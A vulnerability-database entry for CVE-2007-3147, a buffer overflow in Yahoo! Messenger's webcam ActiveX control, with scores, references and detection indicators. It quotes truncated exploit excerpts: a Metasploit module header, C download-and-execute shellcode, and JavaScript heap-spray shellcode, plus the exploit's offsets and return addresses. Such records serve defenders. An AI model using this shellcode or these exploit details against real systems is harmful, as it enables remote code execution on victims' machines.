CVE-2007-3147
Published 2007-06-11
Priority P268 · critical · CVSS 2.0 base score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
ITW · Exploit · VulnCheck KEV: exploited in the wild
EPSS: 40.37% (98.5th percentile)
Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information.
Affected
6 ranges (all indexed as yahoo messenger; no version bounds or fixed version recorded)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yahoo | messenger | — | — |
Detection & IOCs (extracted from sources)
- The vulnerable ActiveX control is ywcupl.dll (CLSID instantiation via browser). Detect instantiation of this control in web content, or the loading of ywcupl.dll into a browser process.
- The exploit triggers by setting an overly long string (>1032 bytes) on the Server() method of the ActiveX control, then calling Send(). Monitor for unusually long property assignments followed by a Send() call on this control.
- The exploit offset is 1032 bytes before the return-address overwrite. A buffer of exactly this size preceding shellcode is a reliable signature in network/memory captures.
- The exploit HTML file generated by the PoC tool is named Click_here.html and contains the heap spray and ActiveX trigger. The filename can be used as a low-confidence indicator.
- Return addresses are platform-specific: 0x71aa32ad targets Windows XP SP0/SP1 Pro English and 0x75022ac4 targets Windows 2000 Pro English (all). Detections based on these RET values will not fire on other OS versions.
- The Metasploit module randomizes the variable names in the generated exploit HTML, reducing the reliability of static string-based signatures on the JS variable names.
- Payload space is limited to 800 bytes, with bad characters \x00\x09\x0a\x0d and quotes/backslashes excluded; shellcode detection signatures must account for this encoding constraint.
CVSS provenance
- NVD (v2.0): 9.3 CRITICAL, AV:N/AC:M/Au:N/C:C/I:C/A:C
- VulnCheck: 9.3 CRITICAL
GHSA
GHSA-55v5-p5xp-vc55: Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl
ghsa_unreviewed · 2022-05-01 · severity HIGH · CWE-119
VulnCheck
yahoo messenger Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck · 2007 · CVSS 9.3 (CRITICAL)
Affected: yahoo messenger
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/
No detection rules found.
Exploit-DB
Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow (Metasploit)
exploitdb · 2010-06-15
---
```ruby
##
# $Id: yahoomessenger_server.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# The angle-bracketed text on the class line was stripped by HTML extraction;
# the "< Msf::Exploit::Remote" / initialize / super(update_info(...)) skeleton
# restored here is the standard Metasploit 3 module form.
class Metasploit3 < Msf::Exploit::Remote

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX
					Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249.
					By sending a overly long string to the "Server()" method, and then calling
					the "Send()" method, an attacker may be able
```
(The indexed module text is truncated at this point.)
Exploit-DB
Yahoo! Messenger Webcam 8.1 - 'Ywcupl.dll' Download / Execute
exploitdb · 2007-06-08
---
```c
/*
Compile in LCC-win32 (Free!)
Download and exec any file you like!
Have Fun!
*/
/* The header names were lost in extraction (angle brackets stripped);
   these are the standard headers the visible code (FILE, fopen) needs. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char *file = "Click_here.html";
FILE *fp = NULL;

/* shellcode embedded by the PoC; the indexed text is truncated mid-string */
unsigned char sc[] =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
"\x04\x83\x2C\x
```
(The indexed exploit text is truncated at this point.)
Exploit-DB
Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow
exploitdb · 2007-06-07
---
```javascript
shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
// heap-spray block: NOP sled filler
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize + shellcode.length;
while (bigblock.
```
(The indexed exploit text is truncated at this point.)
Metasploit
Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
metasploit
This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249. By sending an overly long string to the "Server()" method, and then calling the "Send()" method, an attacker may be able to execute arbitrary code. Using the payloads "windows/shell_bind_tcp" and "windows/shell_reverse_tcp" yields the best results.
No writeups or analysis indexed.
References
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html
- http://messenger.yahoo.com/security_update.php?id=060707
- http://research.eeye.com/html/advisories/published/AD20070608.html
- http://research.eeye.com/html/advisories/upcoming/20070605.html
- http://secunia.com/advisories/25547
- http://securityreason.com/securityalert/2809
- http://securitytracker.com/id?1018204
- http://www.kb.cert.org/vuls/id/949817
- http://www.securityfocus.com/archive/1/470861/100/0/threaded
- http://www.securityfocus.com/bid/24341
- http://www.securityfocus.com/bid/24354
- http://www.securitytracker.com/id?1018203
- http://www.vupen.com/english/advisories/2007/2094
- https://exchange.xforce.ibmcloud.com/vulnerabilities/34758
- https://www.exploit-db.com/exploits/4042